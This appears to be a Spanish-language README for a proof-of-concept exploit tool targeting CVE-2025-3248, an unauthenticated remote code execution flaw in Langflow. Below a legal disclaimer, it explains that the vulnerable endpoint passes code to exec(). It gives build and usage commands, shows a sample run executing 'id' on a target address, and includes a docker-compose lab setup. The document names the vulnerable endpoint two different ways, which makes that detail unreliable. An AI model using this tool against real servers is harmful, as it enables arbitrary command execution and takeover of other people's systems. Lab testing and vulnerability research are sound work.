
⚠️ Aviso legal
Este código está destinado estrictamente solo para fines educativos y de investigación. El uso no autorizado en sistemas sin permiso explícito puede constituir una violación de la ley.
El autor no se hace responsable de ningún uso indebido o actividad maliciosa que involucre esta herramienta.
CVE-2025-3248 - Crítica
Puntuación CVSS: 9.8 | Puntuación EPSS: 92.57% | Publicado: 22 de mayo de 2025
El endpoint /api/v1/validate/code acepta código Python sin sanitizar y lo ejecuta directamente con exec(), sin requerir autenticación.
# langflow/api/builder/execute.py
exec(code) # No input validation or sandboxing!
Langflow expone un endpoint /api/v1/builder/execute_code que toma código Python proporcionado por el usuario y lo pasa directamente a exec() en el backend. Dado que no hay autenticación ni sandboxing, los atacantes pueden crear payloads arbitrarios para la ejecución de código.
# Clone repository
git clone <repo-url>
cd CVE-2025-3248-POC
cargo build --release
# ./target/release/CVE-2025-3248-POC
./CVE-2025-3248-POC --url <BASE_URL> --command "<COMMAND>"
❯ ./target/release/CVE-2025-3248-POC --url 'http://192.168.159.137:7860' --command 'id'
[+] Langflow RCE Exploit - CVE-2025-3248
[+] url :http://192.168.159.137:7860,
[+] Command: id
Status: 200 OK
uid=1000(user) gid=0(root) groups=0(root)
> cd lab
> sudo docker-compose up -d
> ./target/release/CVE-2025-3248-POC --url 'http://localhost:7860' --command 'whoami'
> sudo docker-compose down